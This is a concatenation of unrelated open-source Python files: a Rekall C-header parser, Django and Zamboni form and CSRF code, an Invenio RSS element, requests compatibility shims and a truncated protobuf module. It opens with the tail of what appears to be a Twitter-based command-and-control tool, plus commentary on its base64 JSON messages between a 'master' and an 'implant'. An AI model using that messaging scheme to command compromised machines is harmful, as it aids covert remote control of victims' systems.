stream = Stream(auth, StdOutListener())
stream.userstream()
except BaseException as e:
print("Error in main()", e)
if __name__ == '__main__':
main()
| mit |
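Both message classes above are thin wrappers around the same envelope: a JSON dict, base64-encoded so it survives transport in a Twitter direct message. A round-trip sketch of that encoding, with made-up field values:

# Round trip of the base64(JSON) envelope shared by CommandToExecute and
# CommandOutput. All values are illustrative.
import base64
import json

envelope = base64.b64encode(json.dumps({
    'sender': 'master',
    'receiver': 'AA:BB:CC:DD:EE:FF',   # implant MAC address
    'cmd': 'PING',
    'jobid': '1234',
}))

decoded = json.loads(base64.b64decode(envelope))
assert decoded['cmd'] == 'PING'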
google/rekall | tools/layout_expert/layout_expert/parsers/c_parser.py | 1 | 18196 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Google Inc. All Rights Reserved.
#
# Authors:
# Arkadiusz Socała <[email protected]>
# Michael Cohen <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""A module containing a parser intended for C header files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# pylint: disable=expression-not-assigned
# pylint: disable=pointless-statement
import pyparsing
from layout_expert.c_ast import c_ast
from layout_expert.lib import parsers
from layout_expert.parsers import expression_parser
from layout_expert.parsers import util
_LINE_END = pyparsing.LineEnd().suppress()
_ENUM = pyparsing.Keyword('enum')
_STRUCT = pyparsing.Keyword('struct')
_UNION = pyparsing.Keyword('union')
_COMPOUND_TYPE_KEYWORD = _ENUM | _STRUCT | _UNION
_TYPEDEF = pyparsing.Keyword('typedef').suppress().setName("typedef")
_DECLARATION_KEYWORD = (_COMPOUND_TYPE_KEYWORD | _TYPEDEF).suppress()
_VOLATILE = pyparsing.Keyword('volatile').suppress()
_EXTERN = pyparsing.Keyword('extern').suppress()
_STATIC = pyparsing.Keyword('static').suppress()
_INLINE = pyparsing.Keyword('inline').suppress()
_MAYBE_EXTERN = pyparsing.Optional(_EXTERN)
_MAYBE_VOLATILE = pyparsing.Optional(_VOLATILE)
_DO = pyparsing.Keyword('do').suppress()
_WHILE = pyparsing.Keyword('while').suppress()
_C_FLOW_KEYWORD = _DO | _WHILE
_SIGNED = pyparsing.Keyword('signed') | pyparsing.Keyword('__signed__')
_UNSIGNED = pyparsing.Keyword('unsigned')
_CHAR = pyparsing.Keyword('char')
_SHORT = pyparsing.Keyword('short')
_INT = pyparsing.Keyword('int')
_LONG = pyparsing.Keyword('long')
_LONG_LONG = _LONG + _LONG
_EQUALS = pyparsing.Word("=")
_NUMBER_TYPE_KEYWORD = (
_INT
| _LONG
| _CHAR
| _SHORT
| _UNSIGNED
| _SIGNED
| _LONG_LONG
)
_SEMICOLON = pyparsing.Literal(';').suppress()
_STAR = pyparsing.Literal('*')
_COMMA = pyparsing.Literal(',')
_OPEN_BRACKET = pyparsing.Literal('[').suppress()
_CLOSE_BRACKET = pyparsing.Literal(']').suppress()
_BRACKETS = (_OPEN_BRACKET + _CLOSE_BRACKET).suppress()
_OPEN_PARENTHESIS = pyparsing.Literal('(').suppress()
_CLOSE_PARENTHESIS = pyparsing.Literal(')').suppress()
_OPEN_CURLY = pyparsing.Literal('{').suppress()
_CLOSE_CURLY = pyparsing.Literal('}').suppress()
_COLON = pyparsing.Literal(':').suppress()
_COMA = pyparsing.Literal(',').suppress()
# Apparently GCC understands either form.
_ATTRIBUTE = (pyparsing.Keyword('__attribute__') |
pyparsing.Keyword('__attribute')).suppress()
_DOUBLE_OPEN_PARENTHESIS = _OPEN_PARENTHESIS + _OPEN_PARENTHESIS
_DOUBLE_CLOSE_PARENTHESIS = _CLOSE_PARENTHESIS + _CLOSE_PARENTHESIS
_KEYWORD = (
_DECLARATION_KEYWORD
| _C_FLOW_KEYWORD
| _NUMBER_TYPE_KEYWORD
| _ATTRIBUTE
)
class Parser(object):
"""A parser suitable for parsing C header files.
NOTE: We only support parsing the forms that result after trimming. See
trimming_parser._stuff_we_care_about() for a list of forms we care
about. This parser is used to parse snippets.
"""
def __init__(self, type_manager=None):
self.type_manager = type_manager
self.expression_parser = expression_parser.ExpressionParser(
type_manager=self.type_manager)
self.parser = self._program()
self.anonymous_id = 0
def parse(self, source):
pyparsing.ParserElement.enablePackrat()
result = self.parser.parseString(source, parseAll=True)[0]
pyparsing.ParserElement.disablePackrat()
return result
def _make_anonymous_type(self, object_type):
name = "%s __unknown_%s_%s" % (object_type, object_type,
self.anonymous_id)
self.anonymous_id += 1
return name
def _make_anonymous_field_name(self):
name = "u%s" % (self.anonymous_id)
self.anonymous_id += 1
return name
@util.pyparsing_debug
def _program(self):
return pyparsing.ZeroOrMore(
self._element()
| self._typedef()
).setParseAction(self._make_prog)
def _make_prog(self, t):
return c_ast.CProgram(t.asList())
@util.pyparsing_debug
def _typedef(self):
"""Detect a typedef expression.
e.g: typedef int t;
type ref->^^^ ^<---- type_instance
The type ref is the type that we be aliased. The type_instance is the
name of the new type. The new name can be decorated just like a field so
we use the same parser.
Examples: typedef int t[100]; <---- New type t is an array of int.
typedef int *foo; <---- New type foo is a pointer to int.
"""
return (
_TYPEDEF
+ self._maybe_attributes()("pre_attributes")
+ self._type_reference()("type_definition")
+ self._maybe_attributes()("post_attributes")
+ self._type_instance()("instance")
+ _SEMICOLON
).setParseAction(self._create_typedef)
def _create_typedef(self, tok):
type_definition = self._create_type_definition(
tok.type_definition, tok.instance)
typedef_name = tok.instance.type_instance_name.first
result = c_ast.CTypedef(name=typedef_name,
type_definition=type_definition)
result.add_attributes(tok.instance.attributes)
result.add_attributes(tok.pre_attributes)
result.add_attributes(tok.post_attributes)
# Tell the type manager about the types.
if result.name:
self.type_manager.add_type(result.name, result)
return result
def _create_type_definition(self, type_definition, field):
"""Creates the token definition from inspecting results in tok."""
# The initial type definition we detected.
definition = type_definition
# Is it a pointer to function?
if field.function_args:
if field.function_pointer:
definition = c_ast.CPointer(c_ast.CFunction())
else:
definition = c_ast.CFunction()
# We detected pointers - Add pointer references.
for _ in field.type_pointer:
definition = c_ast.CPointer(definition)
# We detected an array - add an array reference.
for expr in reversed(field.brackets_with_expression_inside):
# 0 length for an anonymous array (e.g. int a[]).
length = 0
if expr:
length = self.expression_parser.evaluate_string(expr)
definition = c_ast.CArray(
length=c_ast.CNumber(length),
type_definition=definition
)
return definition
@util.pyparsing_debug
def _element(self):
"""The parser for all elements."""
self.element = pyparsing.Forward()
self.element << (
(~_TYPEDEF) + (
# e.g. int x;
self._type_name_with_fields()
# e.g. struct s {};
| self._struct_definition_possibly_with_fields()
# e.g. enum foo { OPTION = 1 + 2; };
| self._enum_definition()
| pyparsing.OneOrMore(_SEMICOLON)
)
)
return self.element.setName("element")
@util.pyparsing_debug
def _enum_definition(self):
"""Detect an enum definition.
e.g.
enum foo {
OPTION_1: 1 + 2,
OPTION_2
}
"""
return (
_ENUM
+ pyparsing.Optional(self._identifier())("enum_name")
+ _OPEN_CURLY
+ pyparsing.ZeroOrMore(
pyparsing.Group(
self._identifier()("name")
+ pyparsing.Optional(
_EQUALS
# This allows us to get even invalid expressions.
+ pyparsing.SkipTo(pyparsing.Word(",}"))("expression")
)
+ pyparsing.Optional(_COMMA)
)
)("fields")
+ _CLOSE_CURLY
+ self._maybe_attributes()("attributes")
).setParseAction(self._process_enum_definition)
def _process_enum_definition(self, tok):
fields = []
for field in tok.fields:
if field.expression:
expression = self.expression_parser.parse(field.expression)
else:
expression = None
fields.append(c_ast.CEnumField(
name=field.name.first, value=expression))
name = tok.enum_name
if name:
name = "enum %s" % tok.enum_name.first
else:
name = self._make_anonymous_type("enum")
return c_ast.CTypeDefinition(
name=name, type_definition=c_ast.CEnum(
attributes=tok.attributes,
fields=fields, name=name))
@util.pyparsing_debug
def _struct_definition_possibly_with_fields(self):
"""Detect a struct/enum/union definition.
e.g.
struct foobar {
int v[100];
} __attribute__((packed))
"""
return (
(_STRUCT | _UNION)("type")
+ pyparsing.Optional(self._identifier())("type_name")
+ _OPEN_CURLY
+ pyparsing.ZeroOrMore(
self.element
)("fields")
+ _CLOSE_CURLY
+ self._maybe_attributes()("attributes")
).setParseAction(self._process_struct_definition)
def _process_struct_definition(self, tok):
if tok.type == "struct":
cls_type = c_ast.CStruct
elif tok.type == "enum":
cls_type = c_ast.CEnum
elif tok.type == "union":
cls_type = c_ast.CUnion
# Anonymous types have no real name, we generate one.
name = tok.type_name
if name:
name = "%s %s" % (tok.type, tok.type_name.first)
else:
name = self._make_anonymous_type(tok.type)
type_definition = cls_type(tok.fields, name=name)
type_definition.add_attributes(tok.attributes)
return c_ast.CTypeDefinition(
name=name, type_definition=type_definition)
@util.pyparsing_debug
def _type_name_with_fields(self):
"""Detect type name definitions.
e.g. int v1;
type_t v2, v3;
type refs ^^^^ ^^^ type_instances
Returns:
a list of CField() instances
"""
return (
self._type_reference()("type_definition")
+ self._maybe_attributes()("attributes")
+ pyparsing.delimitedList(
self._type_instance()
)("field")
).setParseAction(self._create_type_name_with_fields)
def _create_type_name_with_fields(self, tok):
"""Creates CField() list from parsed token."""
result = []
for field in tok["field"]:
field.type_definition = tok.type_definition
bit_size = None
if field.bitfield:
bit_size = self.expression_parser.parse(field.bitfield)
type_definition = self._create_type_definition(
tok.type_definition, field)
field_ast = c_ast.CField(
name=field.type_instance_name.first,
bit_size=bit_size,
attributes=tok.attributes,
type_definition=type_definition)
field_ast.add_attributes(field.attributes)
result.append(field_ast)
return result
@util.pyparsing_debug
def _type_reference(self):
"""A reference to a type.
The type may be already defined in place or just referred by name.
"""
identifier = (
self._typeof_expression()
# Inline struct definition.
# e.g. struct { int x; } foo;
| self._struct_definition_possibly_with_fields()
| self._enum_definition()
| self._numeric_type_identifier()
| self._compound_type_identifier()
| self._identifier()
)
return (
pyparsing.ZeroOrMore(_VOLATILE)
+ identifier
).setParseAction(self._create_type_reference)
def _create_type_reference(self, tok):
if len(tok.type_definition) > 1:
return c_ast.CTypeReference(" ".join(tok.type_definition.asList()))
type_name = tok.type_definition.first
if isinstance(type_name, c_ast.CTypeDefinition):
return type_name
return c_ast.CTypeReference(type_name)
@util.pyparsing_debug
def _type_instance(self):
"""A type declaration.
The modifiers of a typedef:
struct s *P[];
^^^^<- The type instance.
"""
type_instance = (
# Function pointer (*f)(int foobar)
pyparsing.ZeroOrMore(_STAR)
+ _OPEN_PARENTHESIS
+ pyparsing.Optional(_STAR("function_pointer"))
+ self._identifier()("type_instance_name")
+ _CLOSE_PARENTHESIS
+ parsers.anything_in_parentheses()("function_args")
) | (
# Function object f(foo bar *)
pyparsing.ZeroOrMore(_STAR)
+ self._identifier()("type_instance_name")
+ parsers.anything_in_parentheses()("function_args")
) | (
# Simple form: *foo[10];
pyparsing.ZeroOrMore(_STAR)("type_pointer")
+ self._identifier()("type_instance_name")
# Possibly array: [] , [][]
+ pyparsing.ZeroOrMore(
_OPEN_BRACKET
+ pyparsing.SkipTo(_CLOSE_BRACKET)(
"brackets_with_expression_inside*")
+ _CLOSE_BRACKET)
# Bitfields: int x: 7;
+ pyparsing.Optional(
_COLON
+ pyparsing.SkipTo(
_SEMICOLON | _COMMA)("bitfield")
)
)
return pyparsing.Group(
type_instance
+ self._maybe_attributes()
)
@util.pyparsing_debug
def _maybe_attributes(self):
"""Possibly match some attributes.
The syntax of attributes is described here:
https://gcc.gnu.org/onlinedocs/gcc/Attribute-Syntax.html
"""
return pyparsing.Group(
pyparsing.ZeroOrMore(
_ATTRIBUTE
+ _DOUBLE_OPEN_PARENTHESIS
+ pyparsing.delimitedList(
pyparsing.Group(
self._identifier()("name")
+ pyparsing.Optional(
_OPEN_PARENTHESIS
+ parsers.anything_beetween("()")("args")
+ _CLOSE_PARENTHESIS
)
)
)
+ _DOUBLE_CLOSE_PARENTHESIS
).setParseAction(self._make_attribute)
)("attributes")
def _make_attribute(self, tok):
"""Compose a c_ast.CAttribute() object for each attribute."""
result = []
for attr_specifier in tok:
expression = []
if attr_specifier.args:
# Try to parse the expression if possible.
try:
expression = [self.expression_parser.parse(
attr_specifier.args)]
except pyparsing.ParseException:
pass
result.append(c_ast.CAttribute(
attr_specifier.name.first,
*expression))
return result
@util.pyparsing_debug
def _typeof_expression(self):
keyword = (
pyparsing.Keyword('typeof')
| pyparsing.Keyword('__typeof__')
)
return pyparsing.Combine(
keyword
+ pyparsing.Literal('(')
+ parsers.anything_beetween('()')
+ pyparsing.Literal(')')
)
@util.action
def _create_typeof_expression(self, keyword, *arguments):
return c_ast.CFunctionCall(
function_name=keyword,
arguments=arguments,
)
@util.pyparsing_debug
def _numeric_type_identifier(self):
with_sign_identifier = (
self._number_sign_identifier()
+ pyparsing.Optional(self._number_size_identifier())
)
with_size_identifier = (
pyparsing.Optional(self._number_sign_identifier())
+ self._number_size_identifier()
)
return with_sign_identifier | with_size_identifier
@util.pyparsing_debug
def _compound_type_identifier(self):
return (
(_ENUM | _STRUCT | _UNION)
+ self._identifier()
)
@util.pyparsing_debug
def _number_sign_identifier(self):
return _SIGNED | _UNSIGNED
@util.pyparsing_debug
def _number_size_identifier(self):
may_have_int_suffix = _LONG_LONG | _SHORT | _LONG
return _INT | _CHAR | (may_have_int_suffix + pyparsing.Optional(_INT))
@util.pyparsing_debug
def _identifier(self):
proper_identifier = pyparsing.Word(
pyparsing.alphas + '_',
pyparsing.alphanums + '_',
)
return (
(~_KEYWORD)
+ proper_identifier
)
@util.pyparsing_debug
def _natural(self):
return pyparsing.Word(pyparsing.nums).setParseAction(util.action(int))
| gpl-2.0 |
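The grammar above leans on a few recurring pyparsing idioms: Keyword/Literal with suppress(), named results, and setParseAction building AST nodes. A self-contained miniature of the same pattern; this toy grammar is not part of the layout expert.

# Toy grammar in the same pyparsing style as Parser above: suppressed
# punctuation, named results, and a parse action that builds a node.
import pyparsing

_SEMI = pyparsing.Literal(';').suppress()
_IDENT = pyparsing.Word(pyparsing.alphas + '_', pyparsing.alphanums + '_')

decl = (_IDENT('type_name') + _IDENT('var_name') + _SEMI).setParseAction(
    lambda tok: {'type': tok.type_name, 'name': tok.var_name})

print(decl.parseString('int counter;')[0])
# -> {'type': 'int', 'name': 'counter'}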
elysium001/zamboni | mkt/comm/forms.py | 1 | 2741 | from django import forms
from django.conf import settings
from django.forms import ValidationError
import happyforms
from jinja2.filters import do_filesizeformat
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.api.forms import SluggableModelChoiceField
from mkt.comm.models import CommunicationThread
from mkt.constants import comm
from mkt.extensions.models import Extension
from mkt.webapps.models import Webapp
class AppSlugForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=Webapp.with_deleted.all(),
sluggable_to_field_name='app_slug')
class ExtensionSlugForm(happyforms.Form):
extension = SluggableModelChoiceField(queryset=Extension.objects.all(),
sluggable_to_field_name='slug')
class CreateCommNoteForm(happyforms.Form):
body = forms.CharField(
error_messages={'required': _lazy('Note body is empty.')})
note_type = forms.TypedChoiceField(
empty_value=comm.NO_ACTION,
coerce=int, choices=[(x, x) for x in comm.API_NOTE_TYPE_ALLOWED],
error_messages={'invalid_choice': _lazy(u'Invalid note type.')})
class CreateCommThreadForm(CreateCommNoteForm):
app = SluggableModelChoiceField(queryset=Webapp.with_deleted.all(),
sluggable_to_field_name='app_slug')
version = forms.CharField()
def clean_version(self):
version_num = self.cleaned_data['version']
versions = self.cleaned_data['app'].versions.filter(
version=version_num).order_by('-created')
if versions.exists():
return versions[0]
raise forms.ValidationError(
_('Version %s does not exist') % version_num)
class CommAttachmentForm(happyforms.Form):
attachment = forms.FileField(label=_lazy(u'Attachment:'))
description = forms.CharField(required=False, label=_lazy(u'Description:'))
max_upload_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE
def clean(self, *args, **kwargs):
data = super(CommAttachmentForm, self).clean(*args, **kwargs)
attachment = data.get('attachment')
max_size = self.max_upload_size
if attachment and attachment.size > max_size:
# L10n: error raised when review attachment is too large.
exc = (_('Attachment exceeds maximum size of %s.') %
do_filesizeformat(self.max_upload_size))
raise ValidationError(exc)
return data
CommAttachmentFormSet = forms.formsets.formset_factory(CommAttachmentForm)
class UnCCForm(happyforms.Form):
pk = SluggableModelChoiceField(
queryset=CommunicationThread.objects.all(),
sluggable_to_field_name='id')
| bsd-3-clause |
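CommAttachmentForm.clean() above enforces the size cap server-side. A sketch of how such a form is exercised with an in-memory upload, assuming a configured Django settings module; file name and contents are illustrative.

# Hypothetical exercise of the attachment form with an in-memory upload.
from django.core.files.uploadedfile import SimpleUploadedFile

from mkt.comm.forms import CommAttachmentForm

upload = SimpleUploadedFile('notes.txt', b'hello', content_type='text/plain')
form = CommAttachmentForm(data={'description': 'demo'},
                          files={'attachment': upload})
if form.is_valid():
    print(form.cleaned_data['attachment'].size)   # 5
else:
    print(form.errors)   # e.g. the "exceeds maximum size" error from clean()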
edisonlz/fruit | web_project/base/site-packages/django/contrib/gis/utils/wkt.py | 219 | 1880 | """
Utilities for manipulating Geometry WKT.
"""
from django.utils import six
def precision_wkt(geom, prec):
"""
Returns WKT text of the geometry according to the given precision (an
integer or a string). If the precision is an integer, the decimal
places of the coordinates in the WKT will be truncated to that number:
>>> pnt = Point(5, 23)
>>> pnt.wkt
'POINT (5.0000000000000000 23.0000000000000000)'
>>> precision_wkt(pnt, 1)
'POINT (5.0 23.0)'
If the precision is a string, it must be valid Python format string
(e.g., '%20.7f') -- thus, you should know what you're doing.
"""
if isinstance(prec, int):
num_fmt = '%%.%df' % prec
elif isinstance(prec, six.string_types):
num_fmt = prec
else:
raise TypeError
# TODO: Support 3D geometries.
coord_fmt = ' '.join([num_fmt, num_fmt])
def formatted_coords(coords):
return ','.join([coord_fmt % c[:2] for c in coords])
def formatted_poly(poly):
return ','.join(['(%s)' % formatted_coords(r) for r in poly])
def formatted_geom(g):
gtype = str(g.geom_type).upper()
yield '%s(' % gtype
if gtype == 'POINT':
yield formatted_coords((g.coords,))
elif gtype in ('LINESTRING', 'LINEARRING'):
yield formatted_coords(g.coords)
elif gtype in ('POLYGON', 'MULTILINESTRING'):
yield formatted_poly(g)
elif gtype == 'MULTIPOINT':
yield formatted_coords(g.coords)
elif gtype == 'MULTIPOLYGON':
yield ','.join(['(%s)' % formatted_poly(p) for p in g])
elif gtype == 'GEOMETRYCOLLECTION':
yield ','.join([''.join([wkt for wkt in formatted_geom(child)]) for child in g])
else:
raise TypeError
yield ')'
return ''.join([wkt for wkt in formatted_geom(geom)])
| apache-2.0 |
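Concretely, assuming the GEOS bindings are available and using the module path from the row header:

# Usage sketch for precision_wkt(); requires django.contrib.gis (GEOS).
from django.contrib.gis.geos import Point
from django.contrib.gis.utils.wkt import precision_wkt

pnt = Point(5, 23)
print(precision_wkt(pnt, 1))        # POINT (5.0 23.0)
print(precision_wkt(pnt, '%.3f'))   # POINT (5.000 23.000)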
KyoungRan/Django_React_ex | Django_React_Workshop-mbrochh/django/myvenv/lib/python3.4/site-packages/django/views/decorators/csrf.py | 586 | 2202 | from functools import wraps
from django.middleware.csrf import CsrfViewMiddleware, get_token
from django.utils.decorators import available_attrs, decorator_from_middleware
csrf_protect = decorator_from_middleware(CsrfViewMiddleware)
csrf_protect.__name__ = "csrf_protect"
csrf_protect.__doc__ = """
This decorator adds CSRF protection in exactly the same way as
CsrfViewMiddleware, but it can be used on a per view basis. Using both, or
using the decorator multiple times, is harmless and efficient.
"""
class _EnsureCsrfToken(CsrfViewMiddleware):
# We need this to behave just like the CsrfViewMiddleware, but not reject
# requests or log warnings.
def _reject(self, request, reason):
return None
requires_csrf_token = decorator_from_middleware(_EnsureCsrfToken)
requires_csrf_token.__name__ = 'requires_csrf_token'
requires_csrf_token.__doc__ = """
Use this decorator on views that need a correct csrf_token available to
RequestContext, but without the CSRF protection that csrf_protect
enforces.
"""
class _EnsureCsrfCookie(CsrfViewMiddleware):
def _reject(self, request, reason):
return None
def process_view(self, request, callback, callback_args, callback_kwargs):
retval = super(_EnsureCsrfCookie, self).process_view(request, callback, callback_args, callback_kwargs)
# Forces process_response to send the cookie
get_token(request)
return retval
ensure_csrf_cookie = decorator_from_middleware(_EnsureCsrfCookie)
ensure_csrf_cookie.__name__ = 'ensure_csrf_cookie'
ensure_csrf_cookie.__doc__ = """
Use this decorator to ensure that a view sets a CSRF cookie, whether or not it
uses the csrf_token template tag, or the CsrfViewMiddleware is used.
"""
def csrf_exempt(view_func):
"""
Marks a view function as being exempt from the CSRF view protection.
"""
# We could just do view_func.csrf_exempt = True, but decorators
# are nicer if they don't have side-effects, so we return a new
# function.
def wrapped_view(*args, **kwargs):
return view_func(*args, **kwargs)
wrapped_view.csrf_exempt = True
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| mit |
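Typical application of these decorators; the views themselves are illustrative.

# Hypothetical views showing how the decorators above are applied.
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie


@csrf_exempt
def webhook(request):
    # Incoming machine-to-machine POSTs skip the CSRF check entirely.
    return HttpResponse('ok')


@ensure_csrf_cookie
def spa_shell(request):
    # Guarantees the csrftoken cookie is set even though no form is rendered.
    return HttpResponse('<html>...</html>')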
ashhher3/invenio | modules/webjournal/lib/elements/bfe_webjournal_rss.py | 25 | 5765 | # -*- coding: utf-8 -*-
## $Id: bfe_webjournal_widget_whatsNew.py,v 1.24 2009/01/27 07:25:12 jerome Exp $
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - Display the index of the latest articles,
including 'breaking news'.
"""
from invenio.webjournal_utils import \
parse_url_string, \
get_journal_categories, \
get_category_query
from invenio.messages import gettext_set_language
from invenio.config import CFG_SITE_URL
from invenio.urlutils import create_html_link
from invenio.dbquery import run_sql
from urllib import quote
def format_element(bfo, categories, label="Subscribe by RSS",
rss_icon_url="/img/rss.png", cc='', css_class="rssLink",
rss_icon_width='16px', rss_icon_height='16px'):
"""
Display RSS links to journal articles, in one or several
categories, or to the whole journal (if 'cc' parameter is used).
Note about 'cc': if we want an RSS of *all* articles (whatever
the category is), either we build an RSS URL to each of the
categories/collections of the journal, or we simply link to the
main collection ('cc') of the journal (which implies that journal
categories exist as sub-collections of 'cc'). The second option is
preferred.
@param categories: comma-separated list of journal categories that will be linked from this RSS. If 'all', use all. If empty, try to use current category.
@param label: label of the RSS link
@param rss_icon_url: if provided, display the RSS icon in front of the label
@param rss_icon_width: if provided, declared width for the RSS icon
@param rss_icon_height: if provided, declared height for the RSS icon
@param cc: if provided, use as root collection for the journal, and ignore 'categories' parameter.
@param css_class: CSS class of the RSS link.
"""
args = parse_url_string(bfo.user_info['uri'])
category_name = args["category"]
journal_name = args["journal_name"]
ln = bfo.lang
_ = gettext_set_language(ln)
if cc:
categories = []
elif categories.lower() == 'all':
categories = get_journal_categories(journal_name)
elif not categories and category_name:
categories = [category_name]
else:
categories = categories.split(',')
# Build the query definition for selected categories. If a
# category name matches a collection name, we can simply search
# in this collection. Otherwise we have to search using the query
# definition of the category.
# Note that if any category does not match a collection name, we
# have to use query definitions for all categories (we cannot
# display all records of a collection while also applying a search
# constraint on the other collections).
collections = []
pattern = []
must_use_pattern = False
for category in categories:
dbquery = get_category_query(journal_name, category)
if dbquery:
pattern.append(dbquery)
res = None
if not must_use_pattern:
res = run_sql("SELECT name FROM collection WHERE dbquery=%s",
(dbquery,))
if res:
collections.append(res[0][0])
else:
# Could not find corresponding collection. Maybe
# replace '980__a' by 'collection'?
if not must_use_pattern:
res = run_sql("SELECT name FROM collection WHERE dbquery=%s",
(dbquery.replace('980__a', 'collection'),))
if res:
collections.append(res[0][0])
else:
# Really no matching collection name
# apparently. Use query definition.
must_use_pattern = True
# Build label
link_label = ''
if rss_icon_url:
if rss_icon_url.startswith('/'):
# Build an absolute URL
rss_icon_url = CFG_SITE_URL + rss_icon_url
link_label += '<img src="%s" alt="RSS" border="0"%s%s/> ' % \
(rss_icon_url, rss_icon_width and ' width="%s"' % rss_icon_width or '',
rss_icon_height and ' height="%s"' % rss_icon_height or '')
if label:
link_label += _(label)
# Build link
rss_url = CFG_SITE_URL + '/rss'
if cc:
rss_url += '?cc=' + quote(cc)
elif must_use_pattern:
rss_url += '?p=' + quote(' or '.join(pattern))
else:
rss_url += '?c=' + '&c='.join([quote(coll) \
for coll in collections])
rss_url += '&ln=' + ln
return create_html_link(rss_url, {},
link_label=link_label,
linkattrd={'class': css_class})
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
_ = gettext_set_language('en')
dummy = _("Subscribe by RSS")
| gpl-2.0 |
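The RSS URL assembly at the end of format_element() boils down to urllib.quote over collection names (or a query pattern). A small sketch; the site URL and collection names are made up.

# Sketch of the '?c=...&c=...' URL form produced above.
from urllib import quote

CFG_SITE_URL = 'https://example.com'           # placeholder site URL
collections = ['Journal News', 'Journal Events']

url = CFG_SITE_URL + '/rss?c=' + '&c='.join(quote(c) for c in collections)
print(url)  # https://example.com/rss?c=Journal%20News&c=Journal%20Events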
dltn/tortellini | server-firmware/Processing/DataPusher/requests/compat.py | 101 | 2600 | # -*- coding: utf-8 -*-
"""
pythoncompat
"""
from .packages import chardet
import sys
# -------
# Pythons
# -------
# Syntax sugar.
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
#: Python 3.0.x
is_py30 = (is_py3 and _ver[1] == 0)
#: Python 3.1.x
is_py31 = (is_py3 and _ver[1] == 1)
#: Python 3.2.x
is_py32 = (is_py3 and _ver[1] == 2)
#: Python 3.3.x
is_py33 = (is_py3 and _ver[1] == 3)
#: Python 3.4.x
is_py34 = (is_py3 and _ver[1] == 4)
#: Python 2.7.x
is_py27 = (is_py2 and _ver[1] == 7)
#: Python 2.6.x
is_py26 = (is_py2 and _ver[1] == 6)
#: Python 2.5.x
is_py25 = (is_py2 and _ver[1] == 5)
#: Python 2.4.x
is_py24 = (is_py2 and _ver[1] == 4) # I'm assuming this is not by choice.
# ---------
# Platforms
# ---------
# Syntax sugar.
_ver = sys.version.lower()
is_pypy = ('pypy' in _ver)
is_jython = ('jython' in _ver)
is_ironpython = ('iron' in _ver)
# Assume CPython, if nothing else.
is_cpython = not any((is_pypy, is_jython, is_ironpython))
# Windows-based system.
is_windows = 'win32' in str(sys.platform).lower()
# Standard Linux 2+ system.
is_linux = ('linux' in str(sys.platform).lower())
is_osx = ('darwin' in str(sys.platform).lower())
is_hpux = ('hpux' in str(sys.platform).lower()) # Complete guess.
is_solaris = ('sunos' in str(sys.platform).lower()) # Solaris reports 'sunos'.
try:
import simplejson as json
except (ImportError, SyntaxError):
# simplejson does not support Python 3.2, it throws a SyntaxError
# because of u'...' Unicode literals.
import json
# ---------
# Specifics
# ---------
if is_py2:
from urllib import quote, unquote, quote_plus, unquote_plus, urlencode, getproxies, proxy_bypass
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
from urllib2 import parse_http_list
import cookielib
from Cookie import Morsel
from StringIO import StringIO
from .packages.urllib3.packages.ordered_dict import OrderedDict
builtin_str = str
bytes = str
str = unicode
basestring = basestring
numeric_types = (int, long, float)
elif is_py3:
from urllib.parse import urlparse, urlunparse, urljoin, urlsplit, urlencode, quote, unquote, quote_plus, unquote_plus, urldefrag
from urllib.request import parse_http_list, getproxies, proxy_bypass
from http import cookiejar as cookielib
from http.cookies import Morsel
from io import StringIO
from collections import OrderedDict
builtin_str = str
str = str
bytes = bytes
basestring = (str, bytes)
numeric_types = (int, float)
| mit |
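Downstream code imports these shims instead of branching on the interpreter itself. A sketch:

# Hypothetical consumer of the compat shims defined above.
from requests.compat import urlparse, str, bytes

parts = urlparse('http://example.com/path?q=1')
print(parts.netloc)          # 'example.com'
print(str is not bytes)      # True on both Python 2 and 3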
Mickey32111/pogom | pogom/pgoapi/protos/POGOProtos/Settings/Master/Item/EggIncubatorAttributes_pb2.py | 16 | 3599 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Inventory import EggIncubatorType_pb2 as POGOProtos_dot_Inventory_dot_EggIncubatorType__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto',
package='POGOProtos.Settings.Master.Item',
syntax='proto3',
